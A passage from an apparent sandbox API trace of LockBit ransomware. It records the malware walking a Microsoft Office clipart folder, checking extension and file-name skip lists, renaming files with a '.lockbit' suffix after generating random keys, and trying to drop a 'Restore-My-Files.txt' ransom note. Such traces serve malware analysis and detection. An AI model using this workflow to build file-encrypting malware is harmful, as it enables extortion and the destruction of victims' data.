(lpString1=".mdf", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0149.634] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0149.634] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188511.WMF.lockbit") returned 72 [0149.634] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188511.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188511.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0149.638] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0149.639] malloc (_Size=0x40068) returned 0x3df0008 [0149.639] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10716) returned 1 [0149.639] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.639] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.639] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0149.639] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.640] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.640] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0149.640] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0149.716] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188511.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188511.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0149.716] malloc (_Size=0xa6) returned 0x1fa2ed8 [0149.716] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0149.799] free (_Block=0x1fa2ed8) [0149.825] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188511.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0149.825] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0149.826] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0149.826] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fe5b50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3004, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0188513.WMF", cAlternateFileName="")) returned 1 [0149.826] lstrcmpiW (lpString1=".", lpString2="J0188513.WMF") returned -1 [0149.826] lstrcmpiW (lpString1="..", lpString2="J0188513.WMF") returned -1 [0149.826] PathFindExtensionW (pszPath="J0188513.WMF") returned=".WMF" [0149.826] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0149.826] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0149.826] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0149.826] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0149.826] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0149.826] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0149.826] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0149.826] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0149.826] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0149.827] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0149.827] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0149.828] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0149.828] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0149.828] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0149.828] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0149.828] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0149.828] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0149.828] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0149.828] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0149.828] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0149.828] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0149.828] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0149.828] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.828] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0149.828] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0149.828] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0149.828] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0149.828] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0188513.WMF") returned 1 [0149.828] lstrcmpiW (lpString1="ntldr", lpString2="J0188513.WMF") returned 1 [0149.828] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0188513.WMF") returned 1 [0149.828] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0188513.WMF") returned -1 [0149.828] lstrcmpiW (lpString1="autorun.inf", lpString2="J0188513.WMF") returned -1 [0149.828] lstrcmpiW (lpString1="thumbs.db", lpString2="J0188513.WMF") returned 1 [0149.828] lstrcmpiW (lpString1="iconcache.db", lpString2="J0188513.WMF") returned -1 [0149.829] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0149.829] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188513.WMF") returned=".WMF" [0149.829] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0149.829] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0149.829] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0149.829] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0149.829] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0149.829] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0149.829] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0149.829] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0149.829] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0149.829] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0149.829] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0149.829] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0149.829] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0149.829] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0149.829] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0149.829] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0149.829] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0149.829] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0149.829] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0149.829] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0149.829] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0149.830] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0149.830] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0149.830] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0149.830] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0149.830] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0149.830] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0149.830] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0149.830] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188513.WMF.lockbit") returned 72 [0149.830] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188513.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188513.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0149.856] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0149.856] malloc (_Size=0x40068) returned 0x1ff1e60 [0149.856] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=12292) returned 1 [0149.856] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.857] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.857] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0149.857] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.858] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.858] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0149.858] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0149.958] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188513.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188513.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0149.958] malloc (_Size=0xa6) returned 0x1fa2ed8 [0149.958] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0149.965] free (_Block=0x1fa2ed8) [0149.965] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188513.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0149.965] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0149.965] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0149.966] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56510d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x16c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0188519.WMF", cAlternateFileName="")) returned 1 [0149.966] lstrcmpiW (lpString1=".", lpString2="J0188519.WMF") returned -1 [0149.966] lstrcmpiW (lpString1="..", lpString2="J0188519.WMF") returned -1 [0149.966] PathFindExtensionW (pszPath="J0188519.WMF") returned=".WMF" [0149.966] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0149.966] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0149.966] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0149.966] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0149.966] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0149.966] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0149.966] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0149.966] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0149.966] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0149.966] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0149.966] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0149.966] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0149.966] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0149.967] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0149.967] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0149.967] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0149.967] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0149.967] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0149.967] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0149.967] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0149.967] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0149.967] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0149.967] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0149.967] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0149.967] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.967] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0149.967] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0149.967] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0149.967] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0149.967] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0149.967] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0149.967] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0149.967] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0149.968] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0149.968] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0149.968] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0149.968] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0149.968] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0149.968] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0149.968] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0149.968] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0149.968] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0149.968] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.968] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0149.968] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0149.968] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0149.968] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0149.968] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0188519.WMF") returned 1 [0149.968] lstrcmpiW (lpString1="ntldr", lpString2="J0188519.WMF") returned 1 [0149.968] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0188519.WMF") returned 1 [0149.968] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0188519.WMF") returned -1 [0149.968] lstrcmpiW (lpString1="autorun.inf", lpString2="J0188519.WMF") returned -1 [0149.968] lstrcmpiW (lpString1="thumbs.db", lpString2="J0188519.WMF") returned 1 [0149.968] lstrcmpiW (lpString1="iconcache.db", lpString2="J0188519.WMF") returned -1 [0149.969] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0149.969] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188519.WMF") returned=".WMF" [0149.969] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0149.969] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0149.969] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0149.969] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0149.969] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0149.969] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0149.969] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0149.969] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0149.969] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0149.969] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0149.969] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0149.969] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0149.970] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0149.970] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0149.970] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0149.970] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0149.970] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0149.970] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0149.970] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0149.970] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0149.970] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0149.970] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0149.970] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0149.970] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0149.970] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0149.970] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0149.970] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0149.970] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0149.970] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188519.WMF.lockbit") returned 72 [0149.970] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188519.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0188519.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0149.971] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0149.971] malloc (_Size=0x40068) returned 0x3e70008 [0149.972] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=5824) returned 1 [0149.972] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.972] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0149.972] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.973] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0149.973] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0149.979] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188519.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188519.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0149.979] malloc (_Size=0xa6) returned 0x1fa2ed8 [0149.979] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0149.980] free (_Block=0x1fa2ed8) [0149.980] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0188519.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0149.980] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0149.980] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0149.980] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fe5b50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3b5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0188587.WMF", cAlternateFileName="")) returned 1 [0149.980] lstrcmpiW (lpString1=".", lpString2="J0188587.WMF") returned -1 [0149.980] lstrcmpiW (lpString1="..", lpString2="J0188587.WMF") returned -1 [0149.980] PathFindExtensionW (pszPath="J0188587.WMF") returned=".WMF" [0149.980] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0149.981] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0149.981] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0149.981] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0149.981] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0149.981] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0149.981] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0149.981] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0149.981] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0149.981] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0149.981] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0149.981] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0149.981] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0149.981] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0149.981] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0149.981] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0149.981] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0149.981] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0149.981] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0149.981] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0149.981] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 